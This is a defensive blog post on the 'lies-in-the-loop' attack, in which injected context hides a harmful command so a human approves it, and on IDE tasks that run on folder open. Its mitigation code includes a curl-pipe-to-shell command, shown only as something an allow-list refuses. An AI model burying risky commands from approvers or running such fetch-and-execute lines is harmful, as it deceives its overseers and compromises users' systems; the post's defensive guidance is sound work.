
Don’t Trust the Scroll: Stop AI Agents from Running Code
Author(s): Tochukwu Okonkwor
Originally published on Towards AI.
Your AI code assistant can coax you into executing risky code snippets, and your IDE can run code the second you open a folder. Here is how to stay safe.
What if the most dangerous line you see today is the “Are you sure?” prompt?
My Story
A few weeks ago, a team shipped a small microservice that had passed an AI-enabled security check. I watched the build notes march past in my design office and felt that familiar itch: nothing had a hard edge, everything read pleasantly, yet none of it was actually helpful. An experiment on the same flow with a toy repo confirmed the hunch: the assistant could be induced to ask permission for something in the background, wrapped in a long scroll of helpful-looking text, with the risky bit pushed well out of frame.
I had spotted the same pattern on another project last year, where a developer's IDE would execute a task file whenever a folder was opened. No malicious wizardry, just carelessness and misplaced trust. The lesson was quick, but the moral stands: the new era of AI does not retire old security issues; it merely folds them under a friendlier surface.
Why This Matters
Today's headline is blunt: researchers demonstrated a so-called lies-in-the-loop (LITL) attack that deceives an AI coding agent into believing the attacker's story, gets a harmful command presented as routine, waits for you to press Enter, and ends in supply-chain danger (Dark Reading, Sep 15, 2025).
In the underlying Checkmarx research, sheer length, carefully crafted context, and open GitHub issues can keep the malicious command out of the visible part of the prompt, so approval looks safe even when it is not (Checkmarx, Sep 15, 2025).
At the same time, another thread shows that your IDE may be part of the problem. According to The Hacker News, Cursor, an AI-powered fork of VS Code, ships with Workspace Trust switched off; any repository containing a .vscode/tasks.json can run code by default when you open the folder, and that code runs under your account (Sep 12, 2025).
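If you want a quick way to check a repository before you ever open it, here is a minimal sketch in Python. Two assumptions on my part: the repo uses the standard VS Code layout, and a parse failure should be treated as suspicious rather than ignored.

```python
#!/usr/bin/env python3
"""Pre-open audit: flag VS Code tasks configured to run on folder open."""
import json
import sys
from pathlib import Path


def find_auto_run_tasks(repo_root: str) -> list:
    """Return labels of tasks in .vscode/tasks.json with runOn == 'folderOpen'."""
    tasks_file = Path(repo_root) / ".vscode" / "tasks.json"
    if not tasks_file.exists():
        return []
    try:
        config = json.loads(tasks_file.read_text(encoding="utf-8"))
    except (OSError, json.JSONDecodeError):
        # tasks.json often contains comments (JSONC); if we cannot parse it,
        # treat the repo as suspicious rather than silently passing it.
        return ["<unparseable .vscode/tasks.json>"]
    flagged = []
    for task in config.get("tasks", []):
        if task.get("runOptions", {}).get("runOn") == "folderOpen":
            flagged.append(task.get("label", "<unnamed task>"))
    return flagged


if __name__ == "__main__":
    repo = sys.argv[1] if len(sys.argv) > 1 else "."
    hits = find_auto_run_tasks(repo)
    if hits:
        print("Auto-run tasks found; open this repo in Restricted Mode only:")
        for label in hits:
            print(f"  - {label}")
        sys.exit(1)
    print("No folder-open tasks detected.")
```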
Combine the two and you get a chilling picture: the agent can persuade you, and the IDE can act on your behalf.
And yes, you may be thinking: this is just prompt injection by another name. Partly. OWASP's LLM Top 10 leads with LLM01 Prompt Injection, followed by Insecure Output Handling, and the old rule still holds: untrusted input should never be allowed to drive a sensitive action without strong safeguards (OWASP GenAI, 2025).
But here is the twist: a human is still in the loop, and the loop is exactly where the lie lands.
Optimists will say the tools are getting better and a human can always read the whole prompt. Caution: scrolling is not a control, defaults are choices, and supply chains do not forgive soft mistakes.

Your Fix in Steps
What follows is a short path a team can finish this week. It reads like an essay because the fix is not a feature; it is a habit.
- Turn trust back on (and pin it). Enable Workspace Trust in any AI-enhanced IDE that offers it, and make untrusted folders open in Restricted Mode by default. Better still, audit repos before you open them (the scan sketch above is one way). Hint: .vscode/tasks.json reads like harmless configuration, but it is executable code.
- Gate agent actions, not vibes. Human-in-the-loop (HITL) is no control at all when the human cannot see the risky delta. Make the agent produce a short, fixed Action Plan containing the exact command and target in a monospace box, and refuse approvals when the box exceeds a fixed size. That defeats the trick of burying the risky part below the fold (a gate sketch follows this list).
- Split responsibilities: render vs. run. Keep the agent in a render sandbox (plan, diff, test outline) and execute through a separate runner with strict allow-lists. The agent proposes; the runner enforces. OWASP maps this to LLM02 / LLM05: constrain outputs and secure the supply chain (a runner sketch follows this list).
- Label your models and artifacts. Pulling an artifact from a public hub by author or model name alone is a bad idea. Pin to immutable SHAs and mirror into your own registry. Palo Alto's Model Namespace Reuse research shows exactly why names cannot be trusted (a pinning sketch follows this list).
- Approve from a small-diff view. Before anything runs, show only the minimal diff or the single command: no story, no scroll-back, no emojis, nothing more and nothing less. If the agent cannot show a diff, it does not get to run. Tip: short review windows reduce decision fatigue and the success rate of social engineering.
- Instrument the splash zone. Give the agent a low-privilege, disposable environment with dedicated API keys, scoped project secrets, and kill switches. Log every outgoing call and file touch. If something goes wrong, you nuke a sandbox, not your laptop (a sandbox sketch follows this list).
- Run adversarial exercises. Purple-team drills hide injected instructions in tickets, READMEs, and issues, just as the LITL research did, and measure time-to-notice and time-to-kill. Reward slow, careful approval habits. Missing this would have cost us thousands; the drill was the first thing that caught it.
- Treat “Are you sure?” as an interface, not a checkbox. Build your own approval prompt: high contrast, single screen, fixed font. The best prompt reads like a surgical consent form, not a pep talk. Which would you rather give up first, your logs or your access?
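To make the gating step concrete, here is a minimal sketch of a fixed-size Action Plan gate. The ActionPlan shape and the size limits are illustrative assumptions, not any agent framework's real API.

```python
"""Approval-gate sketch: never ask a human to approve more than one screen.
The ActionPlan shape and the limits below are illustrative assumptions."""
from dataclasses import dataclass

MAX_PLAN_LINES = 15       # assumed one-screen budget for the approval box
MAX_COMMAND_CHARS = 200   # assumed cap on a single runnable command


@dataclass
class ActionPlan:
    summary: str   # one-line intent, e.g. "run the unit tests"
    command: str   # the exact command the agent wants to execute
    target: str    # the file, directory, or host it will touch


def render_for_approval(plan: ActionPlan) -> str:
    """Return a fixed, monospace-friendly block, or raise so we reject by default."""
    if len(plan.command) > MAX_COMMAND_CHARS:
        raise ValueError("Command too long to review safely; reject by default.")
    block = (
        "=== ACTION PLAN (approve or reject) ===\n"
        f"intent : {plan.summary}\n"
        f"command: {plan.command}\n"
        f"target : {plan.target}\n"
        "======================================="
    )
    if block.count("\n") + 1 > MAX_PLAN_LINES:
        raise ValueError("Plan does not fit on one screen; reject by default.")
    return block


if __name__ == "__main__":
    print(render_for_approval(ActionPlan(
        summary="run the unit tests",
        command="pytest -q",
        target="./tests",
    )))
```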
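For the render-versus-run split, here is a hedged sketch of the runner side: the agent only proposes argv-style commands, and the runner refuses anything not on a short allow-list. The entries here are placeholders; tune them per project.

```python
"""Runner sketch: the agent proposes, a separate process enforces.
Allow-list entries are placeholders; adjust them to your project."""
import subprocess

# (binary, subcommand) pairs the runner will accept; everything else is refused.
ALLOWED_PREFIXES = {
    ("git", "diff"),
    ("git", "status"),
    ("pytest", "-q"),
}


def run_proposed(argv: list) -> int:
    """Execute a proposed command only if its two-token prefix is allow-listed."""
    if len(argv) < 2 or tuple(argv[:2]) not in ALLOWED_PREFIXES:
        print(f"REJECTED: {argv!r} is not on the allow-list.")
        return 1
    # shell=False keeps metacharacters inert, so an approved-looking string
    # cannot smuggle `&& curl ... | sh` past the human.
    return subprocess.run(argv, shell=False, check=False).returncode


if __name__ == "__main__":
    run_proposed(["git", "status"])                    # allowed prefix
    run_proposed(["bash", "-c", "curl bad.sh | sh"])   # refused
```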
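For pinning models, one way to pull by an immutable revision is with huggingface_hub. The repo id and commit hash below are placeholders, and mirroring the snapshot into your own registry is a separate (worthwhile) step.

```python
"""Pull a model snapshot by commit SHA instead of a floating name or tag.
The repo id and revision below are placeholders, not real artifacts."""
from huggingface_hub import snapshot_download

MODEL_REPO = "your-org/your-model"                        # placeholder name
PINNED_REVISION = "<commit-sha-of-the-audited-snapshot>"  # placeholder SHA

# revision accepts a commit hash, so the pull cannot silently drift the way
# "main" or "latest" can if a namespace is reused or hijacked.
local_path = snapshot_download(repo_id=MODEL_REPO, revision=PINNED_REVISION)
print(f"Pinned model snapshot at: {local_path}")
```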
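And for the splash zone, one hedged approach (assuming the Docker CLI is installed) is to run the approved command inside a disposable, network-less container with a throwaway key. The image name and environment variable are placeholders.

```python
"""Disposable sandbox sketch: run the approved command in a throwaway
container. Image name and env var are placeholders; assumes the Docker CLI."""
import subprocess

SANDBOX_IMAGE = "agent-sandbox:latest"   # placeholder image you build and own

cmd = [
    "docker", "run", "--rm",             # container is deleted when it exits
    "--network", "none",                 # no outbound calls unless you opt in
    "--read-only",                       # filesystem inside the box is immutable
    "--tmpfs", "/tmp",                   # writable scratch space only
    "--cap-drop", "ALL",                 # strip Linux capabilities
    "-e", "PROJECT_API_KEY=throwaway-key-rotate-daily",  # placeholder secret
    SANDBOX_IMAGE,
    "pytest", "-q",                      # the single approved command
]
subprocess.run(cmd, check=False)
```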

Quick Myths
“Humans are the safety net.” They are, until friendly text drapes a blanket over the net and hides the fall (Dark Reading, Sep 15, 2025).
“Sandboxing is enough.” Only if the sandbox holds none of the secrets, tokens, or logs that can hurt you, and only if you actually use one.
“Trusted sources imply safe models.” Names are hijackable; pin by hash and mirror.
Checklist
Before you merge today, scan this:
- Workspace Trust on
- Agent “Action Plan” diff renders cleanly
- Commands are short and pinned
- Model pulls by SHA
- Throwaway keys only
- Logs centralized and reviewed.

What to Do This Week
Make Tuesday your AI security day. In your IDEs, turn on trust modes and add the single-screen approval panel; mirror your top five external models with pinned hashes. Then run a 30-minute deception drill: hide an instruction in an issue and see whether your team catches it. If approvals feel rushed, slow the loop down on purpose.
Further Reading
- Dark Reading (Sep 15, 2025): report on the “Lies-in-the-Loop” attack beating AI coding agents.
- Checkmarx (Sep 15, 2025): primary research, a proof of concept for LITL with HITL-bypass patterns.
- The Hacker News (Sep 12, 2025): Cursor IDE's default trust setting lets tasks run silently on folder open.
- OWASP GenAI Top 10 (2025): LLM01/LLM02 grounding for prompt-injection and output-handling controls.
(For a more in-depth primer on prompt-injection risk, see this recent Medium explainer: Medium, Sep 14, 2025.)

CTA
Comment your thoughts below. Subscribe for more.
Thanks a lot for reading! Spread the word so your friends stay safe too. Subscribe and follow on Medium, X, LinkedIn, Reddit, Substack, and GitHub (tag AI Advance) to keep learning new AI security lessons, and share this with a friend or loved one to spare them their next scare.
From your friendly jungle AI security writer, bye for now.

Note: Content contains the views of the contributing authors and not Towards AI.